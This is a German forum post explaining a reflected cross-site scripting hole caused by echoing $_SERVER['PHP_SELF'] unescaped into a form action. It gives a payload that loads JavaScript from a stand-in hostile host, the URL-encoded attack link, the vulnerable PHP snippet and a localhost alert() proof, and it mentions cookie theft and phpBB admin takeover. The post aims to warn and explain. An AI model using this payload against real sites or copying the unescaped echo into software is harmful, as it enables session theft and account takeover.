Doch, es ist ein problem. Zum beispiel so was:
Code: Alles auswählen
"><script type="text/javascript" src="http://boeseseite.de/script.js" /><a href="
Wenn man das urlencoded ans ende das adresse hängt:
Code: Alles auswählen
http://meineseite.de/etwas.php/%22%3E%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fboeseseite.de%2Fscript.js%22+%2F%3E%3Ca+href%3D%22
Dann bekommt man so etwas:
Code: Alles auswählen
<form method="GET" action =""><script type="text/javascript" src="http://boeseseite.de/script.js" /><a href="">
Und schon so wird das böse JS geladen, welches cookies ausliest, oder im schlimmeren fall mittels AJAX andere spassige sachen macht.
Ich hab es überigens auch getestet. Mit folgendem PHP file:
Code: Alles auswählen
<form method="GET" action ="<?php echo $_SERVER['PHP_SELF'] ?>">
<select name="language">
<option value="de">Deutsch</option>
<option value="en">English</option>
</select>
Und ich hab diese seite besucht:
Code: Alles auswählen
http://localhost/test.php/%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%27test%27)%3C/script%3E
Das ergibt dann im quelltext:
Code: Alles auswählen
<form method="GET" action ="/test.php/"><script type="text/javascript">alert('test')</script>">
Natürlich kann man den quelltext als user selbst ändern, das ist nicht das problem. Das problem ist, dass ein angreifer ihn ändern kann, indem er dich hineinlegt die seite zu besuchen (nicht schwer zu machen, einen einzigen link, mit einem redirect versehen und voila). Dann kann er JS laden und zb. in phpBB admin rechte vergeben oder ähnliches.